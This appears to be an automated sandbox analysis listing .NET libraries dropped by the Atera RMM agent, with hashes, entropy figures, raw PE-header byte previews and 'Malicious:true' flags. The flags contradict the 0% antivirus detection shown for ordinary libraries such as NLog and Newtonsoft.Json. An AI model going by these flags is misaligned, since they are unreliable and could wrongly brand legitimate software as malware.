                                                                                                                                                                                                                                        SHA-512:D397888AACB1B787662B1678A24E24DDFA7A42C5363AC673706934A1A42E13F5ED55956D478FAF0998C77891A64F5F26E85DCFA7FFC0A6AE87DF26B3C24C4314
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...%%.W.........." ..0..............M... ...`....... ....................................@.................................lM..O....`...............6..0(..........4L............................................... ............... ..H............text....-... ...................... ..`.rsrc........`.......0..............@..@.reloc...............4..............@..B.................M......H.......d....G...........................................................0...........u....,..s....*.........*Z.(....u-...%-.&*o....*..{....*..{....*..{....*..{....*..{....*2.(....._...*2.(....._...*..{....*2.(....._...*...}......}......}.......}.......}.......}.......}....*>.........}....*..{....*...0...........o].....o^...(....%-.&+..o_....(....,...(....o`.....(....oa....(.......(b...,...(.......(c...od...+"(.......(b...,..(.......(c...od....(.......(e...,...(.......(f...og.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\ICSharpCode.SharpZipLib.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):215088
                                                                                                                                                                                                                                        Entropy (8bit):6.030878409231256
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:x1uYsjrFIzmuxpOI/1MvCdRbpSISC8j7sA:YIzm6pOIgvr75
                                                                                                                                                                                                                                        MD5:44EBFB8CE52A4EFEDF07DA6875CA230E
                                                                                                                                                                                                                                        SHA1:824585DB12A35588F25C0CC5DA77EAEF94011CAD
                                                                                                                                                                                                                                        SHA-256:292F94823959CAFAAA77B81C0A490EA9ACF90B2553727BF3E74C1AE3A7F8AC01
                                                                                                                                                                                                                                        SHA-512:89DD6F5E827A9E23A8F7DBA8F89F55F2A01B290756AE7A6371A5934E9AFC6B3C5702DC0CADAB061405AEA4F2AC275902D8094E7A0ECDA29C8A438C6BCE46ABD0
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....*............" ..0..............'... ...@....... ..............................`.....`..................................'..O....@..t............ ..0(...`.......&..T............................................ ............... ..H............text........ ...................... ..`.rsrc...t....@......................@..@.reloc.......`......................@..B.................'......H........... ...................$&........................................( ...*"..(!...*&...("...*&...(#...*2.r...p(....*"..(....*&...(....*&...(....*2.rE..p(....*"..(....*&...(....*&...(....*2.r...p(....*"..(....*&...(....*&...(....*J..r...p($...(....*v....(%.....(%.....(%...(....*....L...%...%.r...p.%...%.r...p.%....%.r+..p.%...(&...(....*..(....*&...(....*&...(....*.0..)........{.........('...t......|......(...+...3.*....0..)........{.........()...t......|......(...+...3.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Microsoft.ApplicationInsights.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):354352
                                                                                                                                                                                                                                        Entropy (8bit):6.153589479592355
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:Qr/iEF3zTxesPlx5zIAUH+2n8G4smIkuxhnCq7a/ZmvY2:Qhpp9xxIBeXGfvY2
                                                                                                                                                                                                                                        MD5:53594510735A737A2B25AF4B396EFE8F
                                                                                                                                                                                                                                        SHA1:3F4664E88F44BBDCA29AFFB78D866A76ED128965
                                                                                                                                                                                                                                        SHA-256:DFBBDBA40745B2FCDEC5973D1BB0352DD8618996A6231411C48D87D11C63D07A
                                                                                                                                                                                                                                        SHA-512:D9EBC5B83D8727E596EA6A72C49F58C5CB2BC02EC24B432709BCAA7C1C49E267F85520315EF644EC75DC24E3A5D49F64292A295822B27EDEFF452F552D8B89AE
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j.Y..........." ..0..8..........nW... ...`....... ....................................`..................................W..O....`...............@..0(..........HV..8............................................ ............... ..H............text....7... ...8.................. ..`.rsrc........`.......:..............@..@.reloc...............>..............@..B................OW......H.......`...ht...................U........................................{*...*..{+...*V.(,.....}*.....}+...*...0..;........u......,/(-....{*....{*...o....,.(/....{+....{+...o0...*.*. S]G. )UU.Z(-....{*...o1...X )UU.Z(/....{+...o2...X*.0...........r...p......%..{*....................-.q.............-.&.+.......o3....%..{+....................-.q.............-.&.+.......o3....(4...*..{5...*..{6...*..{7...*..{8...*..(,.....}5.....}6.....}7......}8...*....0..k........u......,_(-

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\NLog.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):883760
                                                                                                                                                                                                                                        Entropy (8bit):6.071511083932349
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:o1n1p9LdRN39aQLU0NnWSo7NReIGeFTiQaMcK2VJNUR10+xMhCJqtgsxUsQs:o1n1p9LdRN39aQZUq1
                                                                                                                                                                                                                                        MD5:286642CD396C5B6CADC906B112B493EE
                                                                                                                                                                                                                                        SHA1:CB625FDBD26798B3042BC5CFFD010F4E73CDAF1B
                                                                                                                                                                                                                                        SHA-256:004BF709595E808AE59558AE7510A40277B7E31D99A5580B0E07F136EAE09130
                                                                                                                                                                                                                                        SHA-512:49773E5AD432F893C559308DA144596CE1DFB967DB5FCFB1805528CC7535E70A181ED8801CAE43A47B58656C9925A236B06A4F2C67802A1A875A3DCE3C9002DD
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..F..........:d... ........... ....................................`..................................c..O....................T..0(.......... c..T............................................ ............... ..H............text....D... ...F.................. ..`.rsrc................H..............@..@.reloc...............R..............@..B.................d......H........%...2...........W.......b......................................"..(....*..(....*"..(....*..(....*..(....*..(....*.(....*"..(....*...0..B.......~..........(b...~....,.~.....oc......+...(......od......,..(e....*........../7......"..(....*6.(.....(....*..0..........(.......of...&.*.(....og...*2(.....oc...*....0..?.......~..........(b...~....,.~.....oc...+...(.....oh...&...,..(e....*.........,4.......0..?.......~..........(b...~....,.~....oi......+...(....oj......,..(e..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Newtonsoft.Json.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):710192
                                                                                                                                                                                                                                        Entropy (8bit):5.960469418569573
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:2BARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTUD:2BA/ZTvQD0XY0AJBSjRlXP36RMG6
                                                                                                                                                                                                                                        MD5:B61A163EC8F1E6A3A3572A90BA23F7CB
                                                                                                                                                                                                                                        SHA1:467FBA9F1C171B58B76F4E9E24ABA1CE5C91D02F
                                                                                                                                                                                                                                        SHA-256:87DA900259BEA3BB65D984FB6FCD3134661E3EB0883EBF24981D50CA5D36F51A
                                                                                                                                                                                                                                        SHA-512:87EADB61D95EF67CEA0EC8CF15C2E285AFF8C92941ADB47DBCE6886796DE45B4940EFA803D2A9333FADD09473E1B1A34660042D12562FB07EAF4A59C401244CA
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.}..........." ..0.................. ........... ....................... .......n....`.....................................O.......................0(.............T............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......d....9..................h.........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\OpenHardwareMonitorLib.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):293424
                                                                                                                                                                                                                                        Entropy (8bit):6.121629065121692
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:admT7N9hXNx16L/kakZieD2C6gVkRYKn6nUa9K+yB:adc7N/WkQHr64B
                                                                                                                                                                                                                                        MD5:3362FDB62A7980CA70C44B4DBDA5BE9B
                                                                                                                                                                                                                                        SHA1:77B328FD868E9BE19165C39B541E815BAD1FE13F
                                                                                                                                                                                                                                        SHA-256:A6B74A797384F89B692F2E1027A3F73B4FAD2A97914208158869A33068132A1C
                                                                                                                                                                                                                                        SHA-512:D0441E5C747707434C02A64E8FF3A49EDF33CFF2C9D22F2C22E8BDFEBC30A3CDF79B2ED96B8ABD819ECD042876BAA77C32E119EBB05BA0ECAC73DFE2BF971E86
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....:.d.........." ..0..H..........rb... ........... ..............................k.....`................................. b..O.......$............R..0(........................................................... ............... ..H............text....F... ...H.................. ..`.rsrc...$............J..............@..@.reloc...............P..............@..B................Tb......H.......\....V...........................................................0...........(......o......e...%.r...p.s....}......}......}.......}......{......e...%.r...p.s....o....r...po.... ....(.....|....(....-.."....}......{......e...%.r!..p.s....o........(....(....o.....(......(....-...}....*..}....*..{....*..{....*..0..a........{......W..}.....{....,..{.....o.....{.....{......e...%.r!..p.s....o.....{.......(....(....o....*..{....*....0..Z........{......P..}.....{....,..{.....o

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Polly.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):277040
                                                                                                                                                                                                                                        Entropy (8bit):6.190725872261733
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:ISOIleacQlBh2YQMoIBhpq01TLvlj9b6gRZNsRYl5:XuQlBAMW0BvltxZ66
                                                                                                                                                                                                                                        MD5:66C97A4217593113658977F5AEFC18D8
                                                                                                                                                                                                                                        SHA1:A7E4FF9BDB3800C1E93A0D521B53E344A10699FF
                                                                                                                                                                                                                                        SHA-256:9AD65CC593BFC60815124C6377A8F3EA4F031BCA01C688FB543B50A2B6418764
                                                                                                                                                                                                                                        SHA-512:D2A474718A38AA0EA738200D7584A5C21552DC76428176026C5509AE606FEA534F4AEABEDF93D5BAE5735754D82B2D93E4CFB67BCFEA9A435147D7BB4B1F0722
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0..............'... ...@....... ..............................?a....@..................................&..O....@..L...............0(...`.......%..T............................................ ............... ..H............text........ ...................... ..`.rsrc...L....@......................@..@.reloc.......`......................@..B.................&......H.......L[......................`%......................................^.{....,.(:...z..}.....*^.{....,.(:...z..}.....*"..(?...*"..(@...*...0..,.......sp......}........q...s7...sj....{.....(....*.0..-.......sr......}........s...s7....ss....{.....(....*....0..(.......st......}........u...s7.....{.....(....*.0..'.......sv......}........w...s7...sj.....(....*B...ss.....(....*......(....*.0..'.......sx......}........y...s7...sj.....(....*F...ss......(....*....0..Z..........}....

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\StructureMap.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):284208
                                                                                                                                                                                                                                        Entropy (8bit):6.117308680869445
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:QZgOtIGgeCEwNN4uaNZLVJ8ViVvW18KHxmeWntxX4xHe:Ggo0WPVTXg+
                                                                                                                                                                                                                                        MD5:A6D30251ED124D7656F523A7DF177D09
                                                                                                                                                                                                                                        SHA1:48092D267E067C1967B5ACF1AEBD9A18F0B91515
                                                                                                                                                                                                                                        SHA-256:EC81827B885C0B109AAA3882469BB41D26871274B2E39D3B227FBD18858BF6A3
                                                                                                                                                                                                                                        SHA-512:466809068B5813AC5531D9E5C76BA080A3A15B0D1AFF2A7187149CD5366D990DFD07DF1D51EEB8FCC656ED5C2D1C099AC32E0416F219FC38B64BD1A2351EE502
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....7..........." ..0..$...........C... ...`....... ....................................`..................................B..O....`..D...............0(...........A..T............................................ ............... ..H............text....#... ...$.................. ..`.rsrc...D....`.......&..............@..@.reloc...............,..............@..B.................B......H.......X~..x.............................................................o...+*..o...+*..(....*n.-..r...p.r...p(<...s=...z*...(.....o>...-.r...p.r)..p(<....s?...z*.0..9..........o@......+$..........(A....oB...(...+,...+...X....i2..*..(D...*....0..n.......sE.....oF......+A.......(...+,/..oG....,.rc..p..oH....oI...(J...sK...z...oL.....X....i2..oM............oN....*..(D...*...0..E........oO....+..oP......oQ......8...,......o....-....,..o.........8.....*.*...........'.......V.-.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Buffers.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):22064
                                                                                                                                                                                                                                        Entropy (8bit):6.677526036924594
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:gy/fjFwUI/KQyVvKdDhG6ISDFWvYW8aoNyb8E9VF6IYinAM+oCOq9tH6:guhMaVmzDC67EpYinAMxCQ
                                                                                                                                                                                                                                        MD5:8F678B241B955CF86CF65136ADE90539
                                                                                                                                                                                                                                        SHA1:DFD92464B9C5D6822062721C7C3497CD30850CC4
                                                                                                                                                                                                                                        SHA-256:15F8EEDC717B18D1A43BB3295BE6787E0DF002C284A06A4B9198851BCCFEB7F2
                                                                                                                                                                                                                                        SHA-512:482E6E33F22D7DC68D075600E3C6131A0B563796E34BEBE6352BE8455BD4ECC72F7B682C3E203FEE9CED67C78B60A96B58037CA7499D4F0F86E0B33AB836F048
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^.........." ..0..$...........C... ...`....... ....................................@.................................sC..O....`..@...............0(...........A..8............................................ ............... ..H............text....#... ...$.................. ..`.rsrc...@....`.......&..............@..@.reloc...............,..............@..B.................C......H........(.. ........... @..X...xA......................................j~....%-.&(....s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*.......%...(....*.(....,.r...p......%...%...%...(....*.......%...%...(....*..0..A.......(....,!r...p......%...%...%...%...(....*.......%...%...%...(....*.~....*2r...p.(....*B.....(.........*..(....*R.....(...+%-.&(....*^.....(.....(...+&~..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Data.SQLite.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):409136
                                                                                                                                                                                                                                        Entropy (8bit):6.098204637389941
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:bPaYZ6henFNFfcaFeFOFwcGF6cmFWc0FWc8cIcKcUFJFpcNcHc7cbchFFc5cbc17:p6heZBJm333M89QA+
                                                                                                                                                                                                                                        MD5:5B3639406ABB5AD7F16A90124B708862
                                                                                                                                                                                                                                        SHA1:466DB9D6BC5F2A8EB205E5F3A7F2EC8C52809597
                                                                                                                                                                                                                                        SHA-256:83717328623F05F5987DC258332BCA21C1F2858B7CE6B834AF5DA687B0948847
                                                                                                                                                                                                                                        SHA-512:F10717408E0140C8DBEFCCE9501CF03B86CECD32F2B55770879C28E21D793E45BD8B7EEED52E56E3386000A7BEEF7F0BDD05EBEFF99A44D1056512F48063F71C
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...3.c...........!.................+... ...@....... ....................................`.................................H+..S....@..p...............0(...`.......*............................................... ............... ..H............text........ ...................... ..`.rsrc...p....@......................@..@.reloc.......`......................@..B.................+......H...........tM..........PM..J...P .......................................6K/.%.L....7.......2.x..`..P.k:k.......0\W.j...;..xX.~..HB..S@.$.m...)4..<S1...C.Y......#ku.k&..2<..i{..>....U...s.'{:.(......}....*..{....*:.(......}....*..{....*r.(......}......}......}....*..0..5........-..*~.....o.....X...v....~.......o......o .........*6..(....(....*"..(....*.0..T........~!...("...-..-.~#...*../....+...X....($...-..-.~#...*..v........(%...~.......o&...*Z.~....2..~.........

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Diagnostics.DiagnosticSource.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):51760
                                                                                                                                                                                                                                        Entropy (8bit):6.234968936412768
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:3zpj9H0/bvvmNAkkOMo/23e3vggrkrD9Bxjpm2yuIFLlHTUpa/hDXEpYinAMxCWu:3zpjF0/t043e3vggr83jMYa/hU7HxVu
                                                                                                                                                                                                                                        MD5:BDFEF14C7A661E237F27B79E4FE950F6
                                                                                                                                                                                                                                        SHA1:83F7DC1950211EBEC2B326D0778E6A46781CF892
                                                                                                                                                                                                                                        SHA-256:689AF98555A3D5A36FE8841AD39F9196F60A6A5400A8CF41E6E0997F47E675F1
                                                                                                                                                                                                                                        SHA-512:1E698E4E1E6108524F48B6ED7720E0EE239679546FB429F415A52875C8FA0D5C0B2D8C3EE6F523D1B7E875D1FACA83B6A0EB5B62C0DAED414BDCB36FE0D5C043
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?.Z.........." ..0.................. ........... ..............................b&....@.................................X...O.......................0(.......... ................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........J...g..........p...0.............................................{!...*:.(".....}!...*..0..#........u......,.(#....{!....{!...o$...*.*v ..yN )UU.Z(#....{!...o%...X*....0..M........r...p......%..{!....................-.q.............-.&.+.......o&....('...*..{(...*:.(".....}(...*.0..#........u......,.(#....{(....{(...o$...*.*v ..:. )UU.Z(#....{(...o%...X*....0..M........r-..p......%..{(....................-.q.............-.&.+.......o&....('...*..{)...*..{*...*V.("...

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Memory.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):138288
                                                                                                                                                                                                                                        Entropy (8bit):6.179921646668756
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:YP3XFz0qjCIIMAxlUXsKovHO420kN1A6C8Ils:Yh0qjC5RMOHO420kN1X
                                                                                                                                                                                                                                        MD5:8DDC05CED2922285C9037C7D503A86AA
                                                                                                                                                                                                                                        SHA1:AD66BA39BE8639D86877B515A68EC3D7AD3E7753
                                                                                                                                                                                                                                        SHA-256:30D4499D9F96D1B081C5A8B5F9D9792900DE6767243CBEAD81F6244C33C799E0
                                                                                                                                                                                                                                        SHA-512:6B7E9AC11076C4FAEBF6F51610023BAF0F513DD0680CA2A07DA9AE5E6F6AC42EDBF8CA8F9ED210AC5F3C7D280E8ACBBDAFA4C6916ED2003B9D94693587EEF656
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^.........." ..0.................. ... ....... .......................`...........@.................................3...O.... ..0...............0(...@..........8............................................ ............... ..H............text...\.... ...................... ..`.rsrc...0.... ......................@..@.reloc.......@......................@..B................g.......H........ ..............P.......8.........................................(&...*>..}......}....*..{....*..{....*..{.....{....3..{.....{....('...*.*..0...........%.u....,..........(....*.*z.{....%-.&.+.o(....{....(X...*..(....zN........o)...s*...*.(....z.s+...*..(....zF(L....(F...s,...*.(....z.(M...s,...*.(....z.s-...*.(....z.s....*..(....zN........o)...s/...*.(....zrr...p(S....c.I...(F...s0...*.(....zBr...p(P...s0...*.(....z.s1...*.(....z.(O...s2...*.(!...z.(V...s2...*.(#...z

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Runtime.CompilerServices.Unsafe.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):17968
                                                                                                                                                                                                                                        Entropy (8bit):6.676696708568243
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:Th06sbbVVPWU2W+Nyb8E9VF6IYinAM+oCeBVmh:Ty9eEpYinAMxCAy
                                                                                                                                                                                                                                        MD5:2D491883E24603B382FDAD8840272070
                                                                                                                                                                                                                                        SHA1:78C442E11EA0B9ED3BBD09B19E6A18CC559CA58E
                                                                                                                                                                                                                                        SHA-256:EDF076BA91F6F5A808879D94A586D1BF78D5D0C8FDCD5399DE36FB6389301886
                                                                                                                                                                                                                                        SHA-512:0790CA5BB187AEFE4E5785C528C68E55EA4AFD642101A77A1D983599BC42AB4423723E910A0265CD9A5D3C7DFE0C9E9794DD6F6E8228B488A384647643C09C79
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._...........!.................3... ...@....@.. ...............................w....@.................................@3..K....@..................0(...`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................p3......H........$..0...................P ......................................._.%c......=.n')...(v..:}.d...3...B...).. .:Q(....L.jt....}Xv.b7y0r.[..$.....q..c.6.....p..2..qHv/.pb.=..9.o"z.. 0P.t%H....U...0...........q....*..0..............q....*...0..............q....*...0.................*.0....................*..0....................*..0............q.........*....0............q.........*....0............*..0..........*....0................*..0...............*...0..............

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Runtime.InteropServices.RuntimeInformation.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):27184
                                                                                                                                                                                                                                        Entropy (8bit):6.332801634669375
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:kn1VM0JrpNWDcIh6leOiDFIFBYp1+/EpYinAMxCr/:knvXYcIh6yFIFBYpc47Hxk
                                                                                                                                                                                                                                        MD5:B62DB814A8E1C5C8F4DE32F142D7709F
                                                                                                                                                                                                                                        SHA1:DB5998A9C785E77A1152145615213EA31E06B289
                                                                                                                                                                                                                                        SHA-256:F3E5DDD22B8F044C9B45D99762F2A339077790AB049C1AAB152F70BC7127466E
                                                                                                                                                                                                                                        SHA-512:0F7DAE5AA68ED86A574F70478F99458C4A52B1913D232B20A58045EB1E49C83B9134DD90335FBCBEDEECF691EECE5A137FE06FF9F2F6B9D0607FACEA2C0D7C5B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
